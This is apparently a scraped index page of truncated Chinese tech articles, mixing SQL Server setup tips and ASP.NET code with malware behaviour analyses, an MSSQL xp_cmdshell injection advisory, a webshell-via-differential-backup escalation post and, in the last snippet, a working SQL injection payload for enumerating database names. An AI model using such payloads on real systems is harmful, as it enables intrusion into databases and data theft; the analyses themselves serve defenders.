文件名称:devic.exe文件大小:23304 bytesAV命名:(virustotal上仅卡吧一家报)Backdoor.Win32.SdBot.cok加壳方式:未知编写语言:VC病毒类型:IRCbot文件MD5:45de608d74ee4fb86b20da86dcbeb55c行为分析:1、释放病毒副本:C:\WINDOWS\devic.exe , 23304 字节C:\WINDOWS\img5-2007.zip , 23456 字节2、添加注册表,开机启动:HKEY_LOCAL_MACHINE\SOFTWARE\Mic...
http://www.jb51.net//article/13213.htm
Infos: MSSQL自身存储过程的一个注入Author: 疯子[BCT]Date: 10/11/2007我看到MSSQL的存储过程中,有模有样的在过滤。 然后我就去读读他们的存储过程。就找到了一个注入而已。疯子如是说。漏洞资料如下:master..sp_resolve_logins存储过程中,对@dest_path参数过滤不严,导致xp_cmdshell注入。分析:[code]SELECT @dest_path = RTRIM(LTRIM(@dest_path)) -- If the&nbs...
http://www.jb51.net//article/13066.htm
1、先以 http://www.hotmail.com 为登陆页。出现无法显示网页后,在地址栏的 http 后加 s 回车,即可。 2、MSN 的“秘密通道”:https://login.live.com/login.srf 登陆此网页之后再转到你的空间,你会发现你已经顺利登陆。...
http://www.jb51.net//article/12999.htm
MSDE2000在MS OFFICE XP/2003中都带有。 MS OFFICE 2003: 打开光盘,目录:OFFICE11\MSDE2000\MSDE2KS3.EXE,点击MSDE2KS3.EXE,运行即可。MSDE2KS3.EXE可以运行在Win98/2000Pro/XP下。 MS OFFICE XP: 打开光盘,根目录:MSDE2000,运行setup.exe. 或者,可以直接从微软网站下载: http://download.microsoft.com/downlo...
http://www.jb51.net//article/12849.htm
MSSQL2005连接sql2000非默认端口数据库的问题给我折腾了快一天了,快疯了,连接TCP/IP默认1433端口没问题,连接其他端口数据库问题有了。SQL2005没有像SQL2000一样的客户端网络实用工具,基本上SQL2005算是把SQL2000里面的名字都改了,在网上找资料也没找到,只能一点点的试,终于发现了一个别名,欣喜的给我希望的“别名”。 具体位置是:开始-----SQL2005----配置工具----------SQLSERVERConfigurationManager---里的然后选中右键---新建别名出来了惊喜。如图:输入别名名称输入连接端口号输入服...
http://www.jb51.net//article/12734.htm
昨天在网上找资料的时间无意进了一个站,糊里糊涂就进去了,想提权提不起来,后来加上服务商的Q号想社工一下,射了半天得知服务器的安全是绿盟的人给做的 安全,后来就问猪猪有什么提权的方法没,他刚好做了这个动画就给发来过来,在网上查了一下找到了文章,一起拷贝过来.最近忙着学习很少关注这方面的东西, 落后了,落后了......下面是是在网上找到的资料和动画. TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧!MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码让系...
http://www.jb51.net//article/12706.htm
重装MS SQL Server 2000一般需要彻底删除原安装文件,以前总是无法重新安装,默认被占了,现在网上看到了特用如下方法对付安装挂起问题: 1、在开始->运行中输入regedit 2、到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager 位置 3、选择文件->导出,保存(安全起见) 4、在右边窗口右击PendingFileRenameOperations,选择删除,然后确认...
http://www.jb51.net//article/12639.htm
一、为页面添加一个ScriptManager控件。二、注册命名空间:Type.registerNamespace("Demo");三、为类添加构造函数、属性、方法。Demo.sample=function(){}四、注册类。Demo.Person.registerClass('Demo.sample ', null, Sys.IDisposable);下面是一个具体的实例:Namespace.jsType.registerNamespace("Demo");Demo.Person = function(firstName, lastN...
http://www.jb51.net//article/12597.htm
最近网站挂马比较验证,我的电脑的也超卡,建议大家下360safe,文件名称:image.JPG-www.photobucket.com文件大小:10752 bytes AV命名:(暂无,哈哈``因为全部过了``)加壳方式:未知编写语言:Delphi病毒类型:IRCBot文件MD5:0e404cb8b010273ef085afe9c90e8de1 行为:1、释放病毒副本:%Systemroot%\system32\rpmsvc.exe 10752 字节C:\Documents and Set...
http://www.jb51.net//article/12543.htm
解决参考: 进行如下操作前,请不要进行任何双击打开磁盘的操作。所有下载的工具都直接放桌面上。 思路 1、安全模式下操作 强制删除文件 可借助xdelbox, powerRMV等。[code]C:\Autorun.inf C:\auto.exe d:\Autorun.inf d:\auto.exe e:\Autorun.inf e:\auto.exe f:\Autorun.inf f:\auto.exe g:\Autorun.inf g:\au...
http://www.jb51.net//article/12465.htm
爆库语句,修改红色部分的数字挨个猜出库/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--爆表语句,som...
http://www.jb51.net//article/12449.htm
